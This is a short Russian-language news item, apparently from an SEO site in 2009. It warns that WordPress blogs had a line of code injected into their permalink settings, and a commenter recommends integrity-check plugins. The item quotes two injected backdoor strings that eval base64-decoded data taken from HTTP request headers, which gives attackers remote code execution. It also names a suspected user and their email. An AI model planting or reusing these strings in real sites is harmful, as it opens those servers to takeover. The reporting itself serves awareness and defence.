WP - очередная уязвимость


В блогах на Word Press может появиться посторонний код в ссылках на подкат.

Как сообщил блоггер Zeddy, его блог на платформе WP и блоги его коллег были несанкционированно дополнены лишней строкой кода - вот такой:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или такой:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Взломанные блоги следует очистить от лишних ссылок, а также, возможно, стоит забанить MikeWink (E-mail: bugbeemershonyhe@gmail.com)



Если вы заметили ошибку в тексте новости, пожалуйста, выделите её и нажмите Ctrl+Enter
0 баллов
--+

Комментарии:
  seofin / 07 September 2009 11:52 2
Еще в дополнение, чтобы быть в курсе событий, что творится с ваши ВП, необходимо пользоваться двумя плагинами:
belavir (php MD5) - проверка целостности
TAC (Theme Authenticity Checker) - проверка темы

И в таком случае даже если вам что-то внедрили Вы об этом узнаете...

Для добавления комментария надо зарегистрироваться и авторизоваться.
Добавить комментарий можно после авторизации через Loginza. Yandex Facebook Google Вконтакте Mail.ru Twitter Loginza MyOpenID OpenID


SEO персоны

Александр Волосевич
Компания: Best Masters
Должность: Администратор
Виталий Трахтенберг
Компания: Trakhtenberg Consulting Agency
Должность: Директор
Дмитрий Бобров
Компания: ABIATEC
Должность: Технический директор
ТОП SEO персон

SEO компании

Визор Медия
Разработка сайтов, которые приносят доход. Поисковое продвижение на...
Дизайн-студия nashekrashe
веб-дизайн, графический дизайн, айдентика
ЧУП "Гусаров Групп"
Продвижение сайтов от "А" до "ЯК"
ТОП SEO компаний

Популярные материалы

Михаил Райцин: ''Мы не против стать Китаем на SEO-рынке''

Михаил Райцин, мУркетолог, разработчик бирж Miralinks и WebEffector, дал специальное интервью для Raskrutka.by, где рассказал о годе трафика, WebEffector и конкурентах, а также своих увлечениях.

11.03.2010
  candy hard 23 балла 16

Извилистые пути Девушки-из-Сети

Что думает о байнете и кризисе одна из известнейших белорусских блоггерш Алена aka Девушка, живущая в Сети.

02.03.2009
  candy hard 17 баллов 12

Банковские пластиковые карты Яндекс.Деньги для белорусов: так ли все однозначно?

На прошлой неделе Яндекс запустил новую услугу – выпуск банковских пластиковых карт для Яндекс.Деньги. Об этом Raskrutka.by уже писала ранее. Несмотря на заявление о том, что пользоваться этой карточкой белорусы могут свободно, нас обуяли сомнения: все ли так однозначно?

02.05.2012
  admin 14 баллов 15

Последние вакансии

Интернет-маркетолог

Компания: ООО БелХард Девелопмент
Должность: Интернет-маркетолог
Зарплата (у.е.): По результатам собеcедования

10.10.2019

Программист

Компания: LetItBuild LLC
Должность: Программист
Зарплата (у.е.): 2000

03.12.2014

Программист

Компания: LetItBuild LLC
Должность: Программист
Зарплата (у.е.): 2000

03.12.2014